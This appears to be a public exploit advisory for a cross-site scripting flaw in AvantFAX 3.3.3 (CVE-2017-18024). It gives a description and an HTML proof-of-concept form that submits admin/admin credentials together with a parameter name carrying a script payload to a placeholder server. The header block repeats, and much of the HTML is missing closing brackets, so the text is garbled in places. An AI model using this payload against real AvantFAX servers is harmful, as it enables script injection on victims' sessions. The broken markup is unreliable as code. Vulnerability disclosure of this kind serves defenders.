# Title: AvantFAX 3.3.3 - XSS

# Author: Nassim Asrir

# Contact: wassline@gmail.com

# Vendor: https://www.officetracker.com/

# CVE: CVE-2017-18024
< # Title: AvantFAX 3.3.3 - XSS

# Author: Nassim Asrir

# Contact: wassline@gmail.com

# Vendor: https://www.officetracker.com/

# CVE: CVE-2017-18024

# Description

AvantFAX 3.3.3 has XSS via an arbitrary parameter name to the default URI,
as demonstrated by a parameter whose name contains a
SCRIPT element and whose value is 1.

------------------------------------------

# Details

The name of an arbitrarily supplied body parameter is copied into the
HTML document as plain text between tags. The payload
jlbqg<scriptalert(1)</scriptb7g0x was submitted in the name of an
arbitrarily supplied body parameter. This input was echoed

------------------------------------------

#Attack Type

Remote

------------------------------------------


# POC

<html>

<body
<scripthistory.pushState('', '', '/')</script
<form action="http://server/" method="POST"
<input type="hidden" name="username" value="admin" /
<input type="hidden" name="password" value="admin" /
<input type="hidden" name="_submit_check" value="1" /
<input type="hidden" name="jlbqg<script>alert(1)</script>b7g0x" value="1" /
<input type="submit" value="Submit request" /
</form
</body
</html